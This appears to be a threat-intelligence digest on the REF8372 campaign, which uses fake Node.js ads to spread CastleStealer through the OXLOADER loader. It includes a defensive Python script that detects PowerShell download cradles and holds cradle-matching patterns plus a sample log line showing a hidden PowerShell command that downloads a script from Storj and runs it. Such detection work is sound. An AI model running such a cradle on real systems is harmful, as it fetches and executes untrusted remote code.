Researchers uncovered REF8372, a campaign that uses malicious Google Ads and a fake Node.js download site to distribute CastleStealer through OXLOADER, a previously undocumented loader. The operation appears financially motivated and is likely run by Russian-speaking actors; it relies on obfuscation, anti-sandbox checks, and legitimate services such as Storj to evade detection. #CastleStealer #OXLOADER #REF8372 #Storj #GoogleAds
Key points
- OXLOADER is a new malware loader used to deliver CastleStealer.
- The campaign starts with malicious Google Ads and a fake Node.js download site.
- The threat actor likely speaks Russian and avoids infecting CIS-region systems.
- Storj and PowerShell are abused to stage and run the payloads.
- OXLOADER uses heavy obfuscation and anti-sandbox techniques to hinder analysis.
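The Storj-plus-PowerShell staging described above is the most huntable part of the chain. The script below is an added example, not code from the article or from the researchers who reported REF8372: it scans process command-line records for PowerShell download cradles that fetch from a Storj link-sharing host and reports the matches. The `storjshare.io` hostname pattern and the sample log lines are assumptions constructed for the example; verify the hostnames against your own telemetry before using this as a rule.

```python
import re
from dataclasses import dataclass

# Assumed Storj link-sharing/gateway hostname pattern (not stated in the article);
# adjust to whatever hosts you actually see in your proxy or DNS telemetry.
STORJ_URL_RE = re.compile(r"https?://[\w.-]*storjshare\.io[^\s\"']*", re.IGNORECASE)

# Generic PowerShell download/execution cradles and encoded-command switches.
# Nothing here is specific to OXLOADER; it is the usual hunting vocabulary.
CRADLE_RE = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile|"
    r"Start-BitsTransfer|curl|wget|Invoke-Expression|iex)\b"
    r"|(?<=\s)(-EncodedCommand|-enc|-e)\b",
    re.IGNORECASE,
)

POWERSHELL_RE = re.compile(r"powershell(\.exe)?|\bpwsh\b", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    urls: list[str]
    cradles: list[str]


def scan_powershell_lines(lines):
    """Flag PowerShell command lines that combine a download/exec cradle
    with a Storj URL. Requiring both keeps benign PowerShell out of the
    results; an encoded command with no visible URL is deliberately not
    flagged by this rule and would need a separate decode step."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        if not POWERSHELL_RE.search(line):
            continue
        urls = STORJ_URL_RE.findall(line)
        cradles = sorted({m.group(0).lower() for m in CRADLE_RE.finditer(line)})
        if urls and cradles:
            findings.append(Finding(line_no, urls, cradles))
    return findings


# Constructed sample command-line records (hypothetical, not real campaign telemetry).
SAMPLE_LOG = [
    'CommandLine: "C:\\Program Files\\nodejs\\node.exe" --version',
    'CommandLine: powershell.exe -NoP -W Hidden -c "iwr https://link.storjshare.io/s/abc123/stage/p.ps1 '
    '-OutFile $env:TEMP\\p.ps1; iex (gc $env:TEMP\\p.ps1 -Raw)"',
    'CommandLine: powershell.exe -c "Get-ChildItem C:\\Users"',
    'CommandLine: powershell.exe -enc SQBFAFgAIAAo...',
]

if __name__ == "__main__":
    for f in scan_powershell_lines(SAMPLE_LOG):
        print(f"line {f.line_no}: cradles={f.cradles} urls={f.urls}")
```

Only the second sample line is reported: it pairs `iwr`/`iex` with a Storj URL. The fourth line carries an encoded command but no URL, so this rule stays silent on it; in practice you would decode `-enc` payloads in a separate step and feed the result back through the same check.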
Read More: https://thehackernews.com/2026/06/new-oxloader-loader-uses-malicious.html